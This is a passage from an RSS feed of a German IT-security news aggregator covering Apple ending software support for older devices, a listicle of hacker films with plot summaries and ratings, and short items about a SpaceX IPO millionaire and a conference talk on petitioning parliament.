<guid isPermaLink="true">https://tsecurity.de/de/3599878/ios-mac-os/apple-officially-ends-software-support-for-16-devices-this-fall/</guid>
<pubDate>Mon, 15 Jun 2026 19:45:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple will stop providing software updates for 16 devices across four product lines this fall. When it rolls out its new operating systems at the end of the year, several watches, tablets, computers, and media players will be left behind. Fortunately, phones are safe, as the upcoming iOS 27 maintains the exact same compatibility list as iOS 26. If you rely on one of these older models, you might want to consider your options before September arrives.



The company removes older models from its latest software updates



The most noticeable changes happen with the watches. The new watchOS 27 drops five models at once. It requires a newer S9 or S10 chip to run. This marks the biggest loss of recent watch support we have seen yet.




Apple Watch Series 6 (2020)



Apple Watch Series 7 (2021)



Apple Watch Series 8 (2022)



Apple Watch Ultra (1st generation, 2022)



Apple Watch SE (2nd generation, 2022)




Tablets are also seeing big cuts. The new iPadOS 27 update requires an A14 Bionic or M1 chip. This change leaves behind five models that still run the current software.




iPad Air (3rd generation, 2019)



iPad Pro 12.9-inch (3rd generation, 2018)



iPad Pro 11-inch (1st generation, 2018)



iPad (8th generation, 2020)



iPad mini (5th generation, 2019)




Intel computers and older televisions lose access to new features



The transition to custom computer chips is now complete. The release of macOS 27 Golden Gate officially ends support for all remaining Intel models.




MacBook Pro (16-inch, 2019)



MacBook Pro (13-inch, 2020, Four Thunderbolt 3 ports)



iMac (2020)



Mac Pro (2019)




Finally, two media players will not get the new tvOS update. Only newer generation 4K models will receive the newest software this fall.




Apple TV HD (2015)



Apple TV 4K (1st generation, 2017)




Even though these 16 devices are losing the newest features, they will not stop working overnight. The company usually continues to send out security patches for previous operating systems for at least another year. You can keep using your current watch, tablet, or computer safely for now. You just will not see any of the visual changes or new tools coming out in September.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten Hacker-Filme]]></title>
<description><![CDATA[Vorsicht, dieses Film-Listicle kann zu Prokrastination verführen!Nomad Soul | shutterstock.com



Security-Profis und -Entscheider mit Hang zur Filmkunst müssen auch nach Feierabend nicht auf ihr Leib-und-Magen-Thema verzichten – einer Fülle cineastischer Ergüsse sei Dank. 



Das Film-Pflichtpro...]]></description>
<link>https://tsecurity.de/de/3599780/it-security-nachrichten/die-besten-hacker-filme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599780/it-security-nachrichten/die-besten-hacker-filme/</guid>
<pubDate>Mon, 15 Jun 2026 18:58:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/12/Hackerfilme_16z9_Nomad-Soul-shutterstock.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Die besten Hackerfilme CSO 16z9" class="wp-image-3616886" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Vorsicht, dieses Film-Listicle kann zu Prokrastination verführen!</p></figcaption></figure><p class="imageCredit">Nomad Soul | shutterstock.com</p></div>



<p>Security-Profis und -Entscheider mit Hang zur Filmkunst müssen auch nach Feierabend nicht auf ihr Leib-und-Magen-Thema verzichten – einer Fülle cineastischer Ergüsse sei Dank. </p>



<h2 class="wp-block-heading">Das Film-Pflichtprogramm für Security-Profis</h2>



<p>Wir haben die unserer Meinung nach besten (Achtung: Nerd-Brille erforderlich) Hacker-Filme nachfolgend für Sie zusammengestellt – in chronologischer Reihenfolge und inklusive Trailer der jeweiligen Originalfassung. Vielleicht entdecken Sie ja die ein oder andere Perle in unserer Zusammenstellung, die Sie noch nicht kennen – oder einfach viel zu lange nicht mehr gesehen haben.</p>



<p><strong><a href="https://www.imdb.com/title/tt0086567/" title="War Games (1983)" target="_blank" rel="noopener">War Games (1983)</a></strong></p>



<p><strong>Plot:</strong> Ein jugendlicher Hacker (Matthew Broderick) entdeckt durch Zufall eine Backdoor in einem Militärcomputer. Als er dort ein vermeintliches Spiel startet, droht eine nukleare Katastrophe. </p>



<p><strong>Genre:</strong> Action/Drama/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 94 %</p></li>



<li><p>Metacritic 77/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0105435/?ref_=fn_al_tt_1" title="Sneakers (1992)" target="_blank" rel="noopener">Sneakers (1992)</a></strong></p>



<p><strong>Plot:</strong> Ein (physischer) Penetration Tester (Robert Redford) und sein Team (unter anderem Sidney Poitier, Ben Kingsley und Dan Aykroyd) erhalten von der NSA einen Spezialauftrag und geraten zwischen die Fronten.</p>



<p><strong>Genre:</strong> Comedy/Krimi/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 80 %</p></li>



<li><p>Metacritic 65/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0113243/?ref_=fn_al_tt_1" title="Hackers (1995)" target="_blank" rel="noopener">Hackers (1995)</a></strong></p>



<p><strong>Plot:</strong> Zwei berüchtigte Hacker (Angelina Jolie und Johnny Lee Miller) legen sich mit der Regierung an, entdecken dann jedoch die wahre Gefahr: bösartigere Hacker.</p>



<p><strong>Genre:</strong> Krimi/Drama/Romantik</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 33 %</p></li>



<li><p>Metacritic 46/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0113957/?ref_=nv_sr_srsg_0" title="The Net (1995)" target="_blank" rel="noopener">The Net (1995)</a></strong></p>



<p><strong>Plot:</strong> Nachdem einer Softwareentwicklerin (Sandra Bullock) eine ominöse Diskette zugespielt wird, ist nichts wie es vorher war: Ihre Identität wird gestohlen, Menschen in ihrem Umfeld sterben unter mysteriösen Umständen.</p>



<p><strong>Genre:</strong> Action/Thriller/Krimi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,0/10</p></li>



<li><p>Rotten Tomatoes 43 %</p></li>



<li><p>Metacritic 51/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0126765/?ref_=nv_sr_srsg_3" title="23 (1998)" target="_blank" rel="noopener">23 (1998)</a></strong></p>



<p><strong>Plot:</strong> Der 19-jährige Hacker Karl Koch (August Diehl) ist davon überzeugt, im vom Kalten Krieg geprägten Deutschland der 1980er Jahre einer weltweiten Verschwörung auf der Spur zu sein. Als er vom russischen Geheimdienst rekrutiert wird, gerät sein Leben aus den Fugen.</p>



<p><strong>Genre: Biografie/</strong>Thriller/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,2/10</p></li>



<li><p>Rotten Tomatoes —</p></li>



<li><p>Metacritic —</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0133093/?ref_=nv_sr_srsg_0" title="The Matrix (1999)" target="_blank" rel="noopener">The Matrix (1999)</a></strong></p>



<p><strong>Plot:</strong> Der junge Hacker Neo (Keanu Reeves) erhält über seinen Computer mysteriöse Botschaften. Wenig später kämpft er mit den verbündeten Hackern Trinity (Carrie-Anne Moss) und Morpheus (Larence Fishburne) um das Überleben der Menschheit.</p>



<p><strong>Genre:</strong> Action/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 8,7/10</p></li>



<li><p>Rotten Tomatoes 83 %</p></li>



<li><p>Metacritic 73/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0159784/?ref_=nv_sr_srsg_4" title="Takedown (2000)" target="_blank" rel="noopener">Takedown (2000)</a></strong></p>



<p><strong>Plot:</strong> Der Hacker Kevin Mitnick (Skeet Ulrich) verschätzt sich bei einem Angriffsversuch und gerät ins Visier des FBI.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes —</p></li>



<li><p>Metacritic —</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0286751/?ref_=nv_sr_srsg_0" title="Pulse (2001)" target="_blank" rel="noopener">Pulse (2001)</a></strong></p>



<p><strong>Plot:</strong> Eine Gruppe junger Leute entdeckt Hinweise darauf, dass Geistwesen versuchen, über das Internet in die reale Welt zu gelangen. Im Jahr 2006 entstand ein gleichnamiges US-amerikanisches Remake des japanischen Originals.</p>



<p><strong>Genre:</strong> Horror/Sci-Fi</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,5/10</p></li>



<li><p>Rotten Tomatoes 76%</p></li>



<li><p>Metacritic 68/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0244244/?ref_=nv_sr_srsg_0" title="Swordfish (2001)" target="_blank" rel="noopener">Swordfish (2001)</a></strong></p>



<p><strong>Plot:</strong> Ein Hacker (Hugh Jackman) wird von einem Gangster (John Travolta) engagiert, um einen Computerwurm für einen Bankraub zu erschaffen. Bald merkt er jedoch, dass die Dinge anders sind, als sie scheinen.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,5/10</p></li>



<li><p>Rotten Tomatoes 26%</p></li>



<li><p>Metacritic 32/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0408345/?ref_=nv_sr_srsg_0" title="Firewall (2006)" target="_blank" rel="noopener">Firewall (2006)</a></strong></p>



<p><strong>Plot:</strong> Ein IT-Chef (Harrison Ford) gerät ins Visier von Erpressern, die seine Familie bedrohen. Ein Kampf auf Leben und Tod entbrennt – der mit viel technologischem Knowhow geführt wird.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 5,8/10</p></li>



<li><p>Rotten Tomatoes 19%</p></li>



<li><p>Metacritic 45/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0337978/?ref_=nv_sr_srsg_0" title="Live Free or Die Hard (2007)" target="_blank" rel="noopener">Live Free or Die Hard (2007)</a></strong></p>



<p><strong>Plot:</strong> Cybercrime-Terroristen bringen die Ostküste der USA unter ihre Kontrolle. Zeit für Cop-Ikone John McClane (Bruce Willis) wieder einmal den Tag zu retten. Dazu braucht er die Unterstützung eines technisch talentierten aber ansonsten eher tollpatschigen Hackers (Justin Long).</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,1/10</p></li>



<li><p>Rotten Tomatoes 82%</p></li>



<li><p>Metacritic 69/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt0880578/?ref_=nv_sr_srsg_0" title="Untraceable (2008)" target="_blank" rel="noopener">Untraceable (2008)</a></strong></p>



<p><strong>Plot:</strong> Eine FBI-Agentin (Diane Lane) stößt durch Zufall auf eine verstörende Webseite. Die Jagd auf den Webmaster wird zu einer mörderischen Jagd.</p>



<p><strong>Genre:</strong> Krimi/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 16%</p></li>



<li><p>Metacritic 32/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-4-3 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1132620/?ref_=nv_sr_srsg_5" title="The Girl with the Dragon Tattoo (2009)" target="_blank" rel="noopener">The Girl with the Dragon Tattoo (2009)</a></strong></p>



<p><strong>Plot:</strong> In Deutschland besser bekannt unter dem Titel “Verblendung”, erzählt der erste Teil von Stig Larssons Millenium-Trilogie die Geschichte der jungen Hackerin Lisbeth Salander (Noomi Rapace), die einen Kriminalkommissar (Mikael Nyqvist) bei der Aufklärung einer Mordserie unterstützt. Im Jahr 2011 entstand ein Remake des schwedischen Originals mit Beteiligung von James-Bond-Darsteller Daniel Craig.</p>



<p><strong>Genre:</strong> Krimi/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,8/10</p></li>



<li><p>Rotten Tomatoes 85%</p></li>



<li><p>Metacritic 76/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1074638/?ref_=nv_sr_srsg_0" title="Skyfall (2012)" target="_blank" rel="noopener">Skyfall (2012)</a></strong></p>



<p><strong>Plot:</strong> Geheimagent James Bond (Daniel Craig) nimmt es mit einem Cyberterroristen (Javier Bardem) auf. Dabei wird seine Loyalität zu M (Judi Dench) auf eine harte Probe gestellt.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,8/10</p></li>



<li><p>Rotten Tomatoes 92%</p></li>



<li><p>Metacritic 81/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt1837703/?ref_=nv_sr_srsg_0" title="The Fifth Estate (2013)" target="_blank" rel="noopener">The Fifth Estate (2013)</a></strong></p>



<p><strong>Plot:</strong> Daniel Domscheit-Berg (Daniel Brühl) und Julian Assange (Benedict Cumberbatch) tun sich zusammen, um die Whistleblower-Onlineplattform WikiLeaks aus der Taufe zu heben. Das bleibt nicht ohne Folgen.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,2/10</p></li>



<li><p>Rotten Tomatoes 35%</p></li>



<li><p>Metacritic 49/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt2717822/?ref_=nv_sr_srsg_0" title="Blackhat (2015)" target="_blank" rel="noopener">Blackhat (2015)</a></strong></p>



<p><strong>Plot:</strong> Als ein Hacker (Chris Hemsworth) von einem Freund um Unterstützung bei der Untersuchung einer Malware gebeten wird, kommen sie einem weltumspannenden Cybercrime-Netzwerk auf die Spur.</p>



<p><strong>Genre:</strong> Action/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 5,5/10</p></li>



<li><p>Rotten Tomatoes 33%</p></li>



<li><p>Metacritic 52/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt3774114/?ref_=nv_sr_srsg_0" title="Snowden (2016)" target="_blank" rel="noopener">Snowden (2016)</a></strong></p>



<p><strong>Plot:</strong> Der ehemalige CIA- und NSA-Mitarbeiter Edward Snowden (Joseph Gordon-Levitt) entschließt sich, über die Cyber-Methoden und -Praktiken der Geheimdienste auszupacken. Das macht ihn in den USA zum Staatsfeind Nummer Eins.</p>



<p><strong>Genre:</strong> Biografie/Drama</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 7,3/10</p></li>



<li><p>Rotten Tomatoes 61%</p></li>



<li><p>Metacritic 58/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt5164214/?ref_=nv_sr_srsg_1" title="Ocean's Eight (2018)" target="_blank" rel="noopener">Ocean’s Eight (2018)</a></strong></p>



<p><strong>Plot:</strong> Eine erfahrene Kriminelle (Sandra Bullock) plant ihren nächsten großen Coup. Dabei erhält sie unter anderem Unterstützung durch eine Hackerin (Rihanna).</p>



<p><strong>Genre:</strong> Action/Comedy</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,3/10</p></li>



<li><p>Rotten Tomatoes 69%</p></li>



<li><p>Metacritic 61/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/title/tt7937254/?ref_=nv_sr_srsg_0" title="Silk Road (2021)" target="_blank" rel="noopener">Silk Road (2021)</a></strong></p>



<p><strong>Plot:</strong> Uni-Absolvent Ross Ulbricht (Nick Robinson) baut einen illegalen Marktplatz im Darknet auf, der es zu ungeahnter Popularität bringt. Das ruft jedoch auch die Behörden auf den Plan.</p>



<p><strong>Genre:</strong> Biografie<strong>/</strong>Drama/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li><p>IMDb 6,0/10</p></li>



<li><p>Rotten Tomatoes 51%</p></li>



<li><p>Metacritic 41/100</p></li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt14128670/" target="_blank" rel="noreferrer noopener">Kimi (2022)</a></strong></p>



<p><strong>Plot:</strong> Tech-Spezialistin Angela Childs (Zoë Kravitz) entdeckt Aufnahmen, die auf ein Verbrechen hindeuten. Als sie versucht die Behörden einzuschalten, muss sie selbst um ihr Leben fürchten.</p>



<p><strong>Genre:</strong> Drama/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,3/10</li>



<li>Rotten Tomatoes 92%</li>



<li>Metacritic 79/100</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt11858890/?ref_=ttpl_ov" target="_blank" rel="noreferrer noopener">The Creator (2023)</a></strong></p>



<p><strong>Plot:</strong> In einer postapokalyptischen Welt tobt ein vernichtender Krieg zwischen Menschheit und künstlicher Intelligenz. Joshua (John David Washington) will den “Creator”, der die feindliche KI erschaffen hat, zur Strecke bringen.</p>



<p><strong>Genre:</strong> Science Fiction/Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,7/10</li>



<li>Rotten Tomatoes 68%</li>



<li>Metacritic 63/100</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p><strong><a href="https://www.imdb.com/de/title/tt26160190/?ref_=nv_sr_srsg_3_tt_8_nm_0_in_0_q_unlocked" target="_blank" rel="noreferrer noopener">Unlocked (2023)</a></strong></p>



<p><strong>Plot:</strong> Ein Stalker mit ausgeprägten Cybercrime-Fähigkeiten (Yim Si-wan) findet das Smartphone der Büroangestellten Na-mi (Chun Woo-hee), was deren gesamtes Leben auf den Kopf stellt.</p>



<p><strong>Genre:</strong> Thriller</p>



<p><strong>Bewertungen:</strong></p>



<ul class="wp-block-list">
<li>IMDb 6,4/10</li>



<li>Rotten Tomatoes 50%</li>



<li>Metacritic —</li>
</ul>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nach IPO: Ex-SpaceX-Schweißer wird Millionär – arbeitet jetzt aber für Blue Origin]]></title>
<description><![CDATA[Als Einwanderer Juan Hernandez 2015 bei SpaceX anheuerte, will er noch nie von dem Unternehmen gehört haben. Nach dem erfolgreichen Börsengang von Elon Musks Raumfahrtfirma ist Hernandez Millionär. Dabei arbeitet er mittlerweile für Blue Origin.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3597658/it-nachrichten/nach-ipo-ex-spacex-schweisser-wird-millionaer-arbeitet-jetzt-aber-fuer-blue-origin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597658/it-nachrichten/nach-ipo-ex-spacex-schweisser-wird-millionaer-arbeitet-jetzt-aber-fuer-blue-origin/</guid>
<pubDate>Sun, 14 Jun 2026 23:46:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Als Einwanderer Juan Hernandez 2015 bei SpaceX anheuerte, will er noch nie von dem Unternehmen gehört haben. Nach dem erfolgreichen Börsengang von Elon Musks Raumfahrtfirma ist Hernandez Millionär. Dabei arbeitet er mittlerweile für Blue Origin.<a href="https://t3n.de/news/ipo-spacex-schweisser-millionaer-1747602/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of June 7, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of June 7, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3597294/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-7-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597294/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-june-7-2026/</guid>
<pubDate>Sun, 14 Jun 2026 17:48:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px"><br>See the technology stories that people were reading on GeekWire for the week of June 7, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-06-07/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Erfolgreich Petitieren – wie geht das? (tdf2026)]]></title>
<description><![CDATA[Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unterzubringen und die notwendige Unterzeichner zu erreichen?

Bundesweit ein Recht auf Steckersolar, einfachere Nutzung ...]]></description>
<link>https://tsecurity.de/de/3597191/it-security-video/erfolgreich-petitieren-wie-geht-das-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597191/it-security-video/erfolgreich-petitieren-wie-geht-das-tdf2026/</guid>
<pubDate>Sun, 14 Jun 2026 16:03:24 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unterzubringen und die notwendige Unterzeichner zu erreichen?

Bundesweit ein Recht auf Steckersolar, einfachere Nutzung von Steckerspeichern und im ELÄND eine Anti-Palantir Petition. 

* Aber wie macht man das jetzt mit der großen Petition? 
* Was sollte ich vor dem Einbringen beachten? 
* Wie läuft der Auftritt im Ausschuss? 
* Wie gehe ich mit den Medien um? 
* Welche Themen eignen sich?
* Wie gewinne ich Partner?
* Welche Partner bringen uns weiter?

Im kurzen Talk gibt Sebastian Tipps.

* BalkonSolar: https://balkon.solar/news/2023/04/29/balkonsolar-petition-beim-bundestag-endet-mit-101877-unterzeichnungen/
* SteckerSpeicher: https://balkon.solar/news/2024/11/16/petition-die-zweite-kleinspeicher-entfesseln-stromnetz-stabilisieren/
* Jugendbeteiligung: https://studiengruppejugendbeteiligung.wordpress.com/2015/10/17/landtag-von-baden-wuerttemberg-beschliesst-aenderung-des-%c2%a7-41a-der-gemeindeordnung/
* Anti Palantir: https://sbamueller.com/2025/11/06/anhoerung-der-oeffentlichen-petitionen-keine-nutzung-der-software-gotham-von-palantir-in-baden-wuerttemberg-am-do-6-november-2025-1300/

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/XUAHVX/]]></content:encoded>
</item>
<item>
<title><![CDATA[TDF 2026 - Erfolgreich Petitieren – wie geht das?]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 0x - Views:5 https://media.ccc.de/v/tdf5-126-erfolgreich-petitieren-wie-geht-das-

Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unte...]]></description>
<link>https://tsecurity.de/de/3597188/it-security-video/tdf-2026-erfolgreich-petitieren-wie-geht-das/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597188/it-security-video/tdf-2026-erfolgreich-petitieren-wie-geht-das/</guid>
<pubDate>Sun, 14 Jun 2026 16:03:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/8DHKtcmPR6c?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/tdf5-126-erfolgreich-petitieren-wie-geht-das-<br />
<br />
Sebastian hat dreimal erfolgreich die Petitionsplattformen von Bundestag und Landtag genutzt um politische Anliegen durchzubringen. Was braucht es um erfolgreich eine Petition unterzubringen und die notwendige Unterzeichner zu erreichen?<br />
<br />
Bundesweit ein Recht auf Steckersolar, einfachere Nutzung von Steckerspeichern und im ELÄND eine Anti-Palantir Petition. <br />
<br />
* Aber wie macht man das jetzt mit der großen Petition? <br />
* Was sollte ich vor dem Einbringen beachten? <br />
* Wie läuft der Auftritt im Ausschuss? <br />
* Wie gehe ich mit den Medien um? <br />
* Welche Themen eignen sich?<br />
* Wie gewinne ich Partner?<br />
* Welche Partner bringen uns weiter?<br />
<br />
Im kurzen Talk gibt Sebastian Tipps.<br />
<br />
* BalkonSolar: https://balkon.solar/news/2023/04/29/balkonsolar-petition-beim-bundestag-endet-mit-101877-unterzeichnungen/<br />
* SteckerSpeicher: https://balkon.solar/news/2024/11/16/petition-die-zweite-kleinspeicher-entfesseln-stromnetz-stabilisieren/<br />
